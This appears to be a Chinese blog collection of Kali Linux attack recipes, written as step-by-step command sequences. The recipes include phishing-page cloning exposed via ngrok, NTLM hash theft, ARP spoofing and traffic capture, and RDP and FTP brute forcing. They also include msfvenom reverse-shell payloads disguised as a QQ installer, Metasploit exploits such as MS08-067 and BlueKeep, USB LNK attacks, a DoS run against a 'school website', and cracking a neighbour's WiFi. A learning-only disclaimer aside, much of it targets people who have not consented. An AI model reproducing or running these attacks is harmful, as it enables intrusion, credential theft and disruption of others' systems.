Kali 玩机技巧(杂篇)

Kali Linux (杂篇)

”该工具仅限于安全技术学习,请勿用于其它攻击行为,一切使用造成的违法后果,皆与作者无关“

如何克隆任何网站

社会工程学攻击

# setoolkit
> 1
> 2
set:webattack> 3
> 2
> set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.17.130]:
返回一个IP(本机的IP/监听的IP)
set:webattack> Enter the url to clone:http://192.168.xxx.xxx/bWAPP/login.php
开始进行创建......

//访问 本机的IP 192.168.17.130 之后登录
会在监听端口显示 登录信息(内网环境中)
2 > firefox-esr
192.168.xxx.xxx(靶场环境)
//在外网需要进项行 穿透服务
3> ./ngrok http 80       //开启,进行映射到80端口
把链接发送到任何地方

【如何克隆任何网站,并拦截输入信息!】

如何恢复目标计算机删除的文件

文件删除之后,文件没有在回收站,应该如何恢复?
——> Kali远程渗透恢复目标删除数据过程

msf6 exploit(multi/handler)> session -i 1
meterpreter> getuid
meterpreter> getsystem
meterpreter> background
msf6 exploit(multi/handler)> search post/windows
msf6 exploit(multi/handler)> use post/windows/gather/forensics/enum_drives
msf6 post(windows/gather/forensics/enum_drives)> options
msf6 post(windows/gather/forensics/enum_drives)> set session 1
msf6 post(windows/gather/forensics/enum_drives)> exploit       //查看盘符
......//显示的ID
msf6 post(windows/gather/forensics/enum_drives)> use post/windows/gather/forensics/recovery_files       //这个模块主要就是进行数据恢复
msf6 post(windows/gather/forensics/recovery_files)> options
msf6 post(windows/gather/forensics/recovery_files)> set drive E:
msf6 post(windows/gather/forensics/recovery_files)> set session 1
msf6 post(windows/gather/forensics/recovery_files)> exploit
...... //检索删除的文件
msf6 post(windows/gather/forensics/recovery_files)> options
msf6 post(windows/gather/forensics/recovery_files)> set files ID,ID2,ID3......  //进行恢复

如何从某赌某诈骗的恶意手机app中提取有用的信息

# apkleaks
python3 apkleaks.py -f /home/hackerxxls/Desktop/新建文件夹/456.apk -o test1.txt
//不断分析的软件包 得到 [IP_Address]
# Apkatshu
./Apkatshu.sh apktool /home/hackerxxls/Desktop/新建文件夹/123.apk
cd Outpkatshu
ls

【如何从某赌某诈骗的恶意手机app中提取有用的信息!】

用pdf等的捕获 Windows的Ntlm-hash,验证明文账密

git clone https://github.com/Greenwolf/ntlm_theft
pip3 install xlsxwriter
ntlm windows sso Im hash
nt hash ntlm hash 算法 unicode

cd ntlm_theft
ls
python3 ntlm_theft.py -h
python3 ntlm_theft.py -g all -s 192.168.17.142 -f test
ls
cd test
ls
//窃取器文件的生成
2# responder -I eth0       //开始监听
3# cd /usr/share/responder/logs
ls
john SMB_NTLMv2-SSP-192.168.17.137.txt     //哈希破解,验证哈希

【用pdf等的捕获windows的Ntlm-hash,验证明文账密!】

ARP 欺骗

Arpspoof 工具介绍

 Arpspoof 是一个非常好的ARP欺骗的源代码程序。它的运行不会影响整个网络的通信,该工具
 通过替换传输中的数据从而到达对目标的欺骗。
 一、URL 流量操纵攻击
 root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward     //开启路由转发功能
 root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1   //启动Arpspoof注入攻击目标系统。
 攻击的方法是攻击者(192.168.6.1)和目标系统(192.168.6.101)  
 一、首先欺骗目标系统
 二、端口重定向攻击
 三、捕获并监视无线网络数据
# apt-get install dsniff
echo 1 > /proc/sys/net/ipv4/ip_forward   //每次执行都要重新进行一次开启
arpspoof -i eth0 -t 192.168.223 192.168.223.142
2# urlsnarf -i eth0   //捕获目标计算机的url(网址)
3# sudo driftnet -i eth0   //捕获一下图片(图片劫持)

【你知道黑客对你的网络IP地址进行欺骗,可以看到你浏览的什么内容吗?网络安全渗透测试】

Kali Linux “撬棍”

crowbar(github)

msfconsole
msf6> search rdp
msf6> use auxiliary/scanner/rdp/rdp_scanner
msf6 auxiliary(scanner/rdp/rdp_scanner)> options
msf6 auxiliary(scanner/rdp/rdp_scanner)> set RHOSTS 192.168.xxx.xxx
msf6 auxiliary(scanner/rdp/rdp_scanner)> exploit
......
msf6 auxiliary(scanner/rdp/rdp_scanner)> exit
2#
cd /home/sth/文档/crowbar-master
ls
./crowbar.py --server 192.168.223.154/32 -b rdp -u USER -C /root/pass.txt   //爆破得到密码
......
3# 
sudo xfreerdp /u:USER /p:xxls123456 /v:192.168.223.154   //捕获(桌面情况)

用 Kali 为学校网站做贡献

unzip pentmenu-master.zip
cd pentmenu-master/
chmod a+x pentmenu
su root
./pentmenu
Pentmenu>2
Pentmenu>9
...
Enter targets:
[目标网站的URL]
Enter target port (defaults to 80):

Using port 80
Enter number of connections to open (default 2000):
20000
.....(y)

没什么卵用

Kali 爬虫的几种方式

1#
msfconsole
msf6> search msfcrawler
msf6> use auxiliary/crawler/msfcrawler
msf6 auxiliary(crawler/msfcrawler)> options
msf6 auxiliary(crawler/msfcrawler)> set rhosts 192.168.17.133
msf6 auxiliary(crawler/msfcrawler)> set THREAD 10   //设置线程数
msf6 auxiliary(crawler/msfcrawler)> exploit
... ...
2#
mkdir 123
cd 123
httrack http://192.168.17.133/
... ...
3#
OWASP ZAP

【黒客系统-kali进行爬虫的几种方法!】

如何用 tor服务隐藏自己的渗透行为!

~#
apt-get install proxychains
apt-get install tor
man proxychains     //打开代理链
... ... //找到文件 /etc/proxychains.conf
sudo vim /etc/proxychains.conf
	把 strict_chain 禁用 #strict_chain
	打开 #random_chain ——> random_chain(随机代理链)
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050

sudo systemctl status tor.service
sudo systemctl start tor.service
sudo systemctl stop tor.service
sudo proxychains firefox ip138.com
sudo proxychains nmap -sS 192.168.18.*

如何用tor服务隐藏自己的渗透行为!

如何利用世界上最流行的扫描程序做漏扫!

~#
dpkg -i Nessus-10.0.2-debian6_amd64.deb   //解压
[/home/kali/Downloads]
/bin/systemctl start nessusd.service   //开启服务
copy URL[地址] 在浏览器中打开 https://kali:8834/#/

黑客攻击检测之 Hfish(蜜罐)

~# 
cp hfish-2.8.1-linux-arm64.tgz /opt/Hfish/
cd /opt/Hfish/
ls
tar -xzvf hfish-2.8.1-linux-arm64.tgz
ls
rm -rf hfish-2.8.1-linux-arm64.tgz
cd 2.8.1/
cat README.md
cd ..
ls
./install.sh
nohup: appending output to 'nohup.out'
cat nohup.out
netstat -altunp |grep hfish
//默认用户名密码为:**admin / HFish2021**
//Linux 进入hfish安装路径的版本目录,执行:**./tools -mode resetpwd**
//Windows 打开cmd进入hfish安装路径的版本目录:执行:**./tools -mode resetpwd**

//确认防火墙开启4433和4434端口
登陆链接:https://[ip]:4433/web/login
账号:admin
密码:HFish2021

如何对本地网络进行限制

“邪恶制造者”

~# 
git clone https://github.com/bitbrute/evillimiter.git
git clone git://github.com/bitbrute/evillimiter.git
cd evillimiter
sudo python3 setup.py install   //安装
evillimiter   //启动工具
(Main) >>> ?
(Main) >>> scan   //扫描设备
(Main) >>> hosts
(Main) >>> limit 3 100kbit
(Main) >>> hosts   //查看状态
(Main) >>> free 3   //解除状态
(Main) >>> block 3   //网络阻断

如何对本地网络进行限制,让聚会在也没人玩手机!

如何破解加密压缩包和pdf文件

~# 破解ZIP
zip2john -h
zip2john crack.zip >> pass.txt   //添加加密的压缩包文件,输出一个文档(提取压缩包的 哈希密码值)
john pass.txt   //用john破解哈希密码
cd /usr/share/john
ls
vim john.conf    //可以更改字典的位置
~# 破解PDF
apt install pdfcrack
pdfcrack -w /root/dict/pass/pass.txt crack.pdf   //破解

如何破解加密压缩包和pdf文件!

如何在任意图片和音乐中加密嵌入重要文件!

~#
apt-get install steghide
steghide --help
steghide embed -ef 123 -cf 6.jpg -sf 61.jpg -Z     //进行嵌入
Enter passphrase:
steghide extract -sf 61.jpg   //提取
Enter passphrase:

如何在任意图片和音乐中加密嵌入重要文件!网络安全!

如何利用psh脚本,对win11进行远程渗透

~#
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.17.128 lport=443 -f pash > shell.ps1
~#
msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler)> options
msf6 exploit(multi/handler)> set lhost 192.168.17.128
msf6 exploit(multi/handler)> set lport 443
msf6 exploit(multi/handler)> exploit
... ...
meterpreter>

>Windows PowerShell<
//输入指令,绕过执行策略
//利用 badUSB 或其他应用程序去执行
> powershell -ep bypass
> .shell.ps1

如何利用psh脚本,对win11进行远程渗透!

如何安装一款黑客御用无线网络攻击系统

wifislax.com/category/wifislax-64.bits/download-wifislax-x64/

如何安装一款黒客御用无线网络攻击系统!

Windows 入侵(例)

~# WindowsXP
msfconsole
msf6> search ms08_67
msf6> use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi)> options
msf6 exploit(windows/smb/ms08_067_netapi)> set rhosts 192.168.223.130
msf6 exploit(windows/smb/ms08_067_netapi)> info   //查看用于的系统版本
msf6 exploit(windows/smb/ms08_067_netapi)> set target 34
msf6 exploit(windows/smb/ms08_067_netapi)> check
msf6 exploit(windows/smb/ms08_067_netapi)> run
... ...
meterpreter> run vnc
meterpreter> exit
msf6 exploit(windows/smb/ms08_067_netapi)> save   //保存!

两分钟获取windows权限!

只需一个网址入侵 Windows系统(例)

~# WindowsXP
msfconsole
msf6> search ms10_018
msf6> use exploit/windows/browser/ms10_018_ie_behaviors
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> options
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set srvhost 192.168.233.129
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set lport 8080
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> exploit
... ...
//生成一个URL
http://192.168.223.129:8080/6FZhJ6
... ...
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> sessions
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> sessions -i 1
meterpreter>
meterpreter> getpid   //获取现在进入后门的进程
meterpreter> ps   //查看进程
meterpreter> migrate 1368   //进程转移
meterpreter> getpid

只需一个网址就可侵入windows系统!

软件安装 Windows系统入侵(例)

~#
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.223.129 LPORT=8080 -f exe -a x86 --platform win -o qq.exe
msfconsole
msf6> use exploit/muliti/handler
msf6 exploit(muliti/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(muliti/handler)> options
msf6 exploit(muliti/handler)> set LHOST 192.168.223.129
msf6 exploit(muliti/handler)> set LPORT 8080
msf6 exploit(muliti/handler)> exploit
meterpreter> run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
meterpreter>
2~#
rdesktop 192.168.223.128   //获取桌面

软件入侵win7

Windows 7电脑系统漏洞的入侵(例)

cve 2019-0708 专门针对:3389端口

~#
nmap -v -sn 192.168.223.120-150   //搜索公网内的一段IP地址
msfdb run   //打开数据库
msf6> search cve_2019_0708
msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> options
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set RHOSTS 192.168.223.142  //刚才搜索到的IP地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> info
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set target 4
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> run
... ...
meterpreter>

Windows 7电脑系统的漏洞侵入

U盘病毒渗透入侵 Windows

~#
msfconsole
msf6> search 2017_8464
msf6> use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> options
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> set lhost 192.168.223.129
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> exploit
//生成木马文件   /home/sth/.msf4/local/
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> back
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler)> options
msf6 exploit(multi/handler)> set lhost 192.168.223.129
msf6 exploit(multi/handler)> run
... ...
//插入U盘反弹shell
meterpreter>

一个U盘入侵Windows系统

Windows系统入侵 ms 10-046 漏洞利用(例)

ms15-020 远程代码,共享文件执行漏洞

漏洞简介:

Microsoft Windows 没有正确处理 DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程 WebDAVSMB 共享上的某些文件利用此漏洞,

成功利用后可导致加载任意库Windows 使用 .lnk 来定义文件或者目录的快捷方式,可以使用 .CPL文件来自定义图标。问题是,在 Windows中,图标从模块(或者可执行文件或动态链接库)加载。

事实上,cpl 文件实际上是 DLL 文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用 .LNK 文件来执行任意代码

渗透过程

WindowsXP
~#
msfconsole
msf6> search ms15-020
msf6> use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> info
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set UNCHOST 192.168.1.3    //设置共享主机IP地址
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set UNCSHARE share        //设置共享文件的文件夹 这里主机 192.168.1.3 在C盘下的share里文件夹开启了共享,提前创建好共享
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set LHOST 192.168.1.7     //设置本地反弹地址
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> exploit
... ...
//把生成的文件复制到共享主机的共享文件下
2~# 开启监听
msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler)> set LHOST 192.167.1.7
msf6 exploit(multi/handler)> exploit
... ...

使用DDOS攻击网站(易)

~#
git clone https://github.com/Andysun06/ddos
cd ddos
python ddos-p3.py
请输入IP	:
攻击端口	:
Traceback (most recent call last):

使用 Kali 破解无线WiFi密码

需要使用一个无线网卡,在 kali 中的 可移动设备 中进行连接,无线网卡需要在kali系统上免驱
kali无线监听网卡免驱
~#
ifconfig —— > wlan0
airmon-ng   //检查网卡是否支持监听功能
airmon-ng start wlan0   //开启无线网卡的监听模式
ifconfig
airodump-ng wlan0mon   //扫描附近的WiFi信号
... ...
//需要记住WiFi的 BSSID、CH
airodump-ng -c 1 --bssid 6c:06:D6:58:xx:xx -w /home/kali/Desktop/handshake wlan0mon   //开始抓包 
~#
//ACK攻击
aireplay-ng -o 10 -a 6c:06:D6:58:xx:xx -c 9A:66:B7:56:5C:xx wlan0mon   //发起ACK攻击
... ...   //会生成 cap文件
aircrack-ng /home/kali/Desktop/字典.txt -b 6c:06:D6:58:xx:xx /home/Desktop/handshake-01.cap   //开始破解
......

超简单教程!如何用kali破解邻居的WiFi密码

~#
airmon-ng check kill   //杀死干扰的进程
airmon-ng —— > wlano
airmon-ng start wlan0
airodump-ng wlan0   //监听
airodump-ng -w /home/kali/waifei/1 --bssid 92:BE:20:CA:xx:xx -c 1 wlan0
aircplay-ng -0 50 -a 92:BE:20:CA:xx:xx -c 9C:2E:A1:02:D7:xx -D wlan0
aircrack-ng /home/kali/waifei/1-01.cap -b 9C:2E:A1:02:D7:xx -w /home/kali/Desktop/weaidfai.txt

(medusa)破解任何在线协议密码

//搭建 ftp
~#
 medusac -h 192.168.174.139 -u xxls -P /root/wenben/pass.txt -M ftp -e ns -F

【美杜莎】黑客如何用它坡解任何在线协议密码?网络安全渗透!

Kali 中英文切换

~#
dpkg-reconfigure locales   //本地配置

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>